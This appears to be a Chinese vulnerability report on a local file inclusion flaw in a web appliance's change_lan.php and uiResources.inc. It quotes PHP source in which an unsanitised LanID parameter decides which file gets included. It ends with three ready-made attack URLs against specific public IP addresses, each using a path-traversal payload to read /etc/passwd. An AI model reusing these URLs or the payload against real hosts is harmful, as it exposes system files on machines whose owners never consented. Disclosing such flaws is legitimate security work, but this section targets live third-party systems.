本地文件包含：

漏洞说明：

出入的地方：在change_lan.php传入会话变量。

error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);

include_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";

require_once dirname(__FILE__)."/acc/common/constant.inc";

include_once dirname(__FILE__)."/acc/common/config/uci/dao/appexSystemDao.inc";

$configItem = new ConfigItem();

/**

*

*

* @version $Id: change_lan.php,v 1.8.2.4 2011/10/11 04:20:42 jzhang Exp $

* @copyright 2008

*/

$lanID = 'En';

$refLink = $_SERVER['HTTP_REFERER'];

if(empty($refLink)){

$refLink = "/index.php";

}

$refLink = str_replace("?error=1", "", $refLink);

if(array_key_exists('LanID',$_REQUEST))

{

$lanID = $_REQUEST["LanID"];

$appexSystemDao = new AppexSystemDao();

$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);

$appexSystemDao->commit();

session_start();

$_SESSION['lanID'] = $lanID;

header('Location: ' . $refLink);

}else{

header('Location: ' . $refLink . '?LanID=' . $lanID);

}

?>

执行的地方在，uiResources.inc，包含语言包

/**

*

*

* @version $Id: uiResources.inc,v 1.4 2009/05/25 08:42:57 jzhang Exp $

* @copyright 2008

*/

include_once dirname(__FILE__)."/../config/item/configItem.inc";

require_once dirname(__FILE__)."/../constant.inc";

include_once dirname(__FILE__)."/../config/uci/dao/appexSystemDao.inc";

$appexSystemDao = new AppexSystemDao();

$lanID = $appexSystemDao->getAppexSystemConfigItemValue(LANGUAGE_ID_FIELD);

if(empty($lanID)){

$lanID = "En";

}

$uiResBasic = dirname(__FILE__) . "/../../common/uiResources_".$lanID.".inc";

$uiRes = dirname(__FILE__) . "/../../common/clsf/uiResources_clsf_".$lanID.".inc";

include_once $uiResBasic;

include_once $uiRes;

?>

网络案例：

http://61.148.24.182:8080/change_lan.php?LanID=../../../../../../../../../etc/passwd%00

http://61.54.222.43:8080/change_lan.php?LanID=../../../../../../../../../etc/passwd%00

http://222.143.9.1/change_lan.php?LanID=../../../../../../../../../etc/passwd%00

截图证明：